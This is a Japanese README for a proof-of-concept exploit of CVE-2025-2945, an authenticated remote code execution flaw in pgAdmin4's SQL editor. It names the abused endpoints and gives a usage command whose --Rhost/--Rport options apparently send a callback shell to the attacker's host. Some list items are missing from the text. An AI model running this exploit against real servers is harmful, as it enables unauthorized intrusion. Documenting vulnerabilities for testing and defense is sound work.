
pgAdmin4(CVE-2025-2945)のSQLエディタ悪用を介した認証済みリモートコード実行の概念実証エクスプロイト。許可されたセキュリティテストと教育用に設計されています。
このリポジトリには、pgAdmin4 の特定バージョンに影響する脆弱性 CVE-2025-2945 に関する概念実証(PoC)スクリプトが含まれています。本スクリプトは、セキュリティ研究および許可を得たペネトレーションテストを目的として作成されました。
この問題により、SQLエディタにアクセスできる認証済みpgAdminユーザーが、Query Toolパネルの初期化フローを悪用してリモートコード実行を引き起こすことができます。このPoCは、教育・監査・防御目的のみで本脆弱性を実証するものです。
このツールは以下の目的にのみ使用を想定しています:
明示的な許可なく、いかなるシステムでもこのツールを使用しないでください。 無許可での使用は違法かつ非倫理的です。 作者は不正使用について一切責任を負いません。
本脆弱性は、SQLエディタの初期化エンドポイントにおけるロジック上の欠陥に起因します。 および へのアクセス時、アプリケーションはユーザー制御のデータを不適切に処理するため、最終的に細工されたペイロードによって任意のバックエンドコマンドが実行可能になります。
/sqleditor/initialize//sqleditor/panel/このPoCは、以下のエンドポイントシーケンスを悪用します:
requests ライブラリpython3 poc.py \
--target-url <pgadmin-url> \
--username <pgadmin-user> \
--password <pgadmin-pass> \
--db-user <db-username> \
--db-pass <db-password> \
--db-name <database> \
--Rhost <your-ip> \
--Rport <your-port>
(完全な使用例はスクリプトのヘルプセクションに記載されています。)
poc.py → The exploit proof-of-concept
README.md → Project documentation
管理者は以下を行う必要があります:
作者: UdayVeer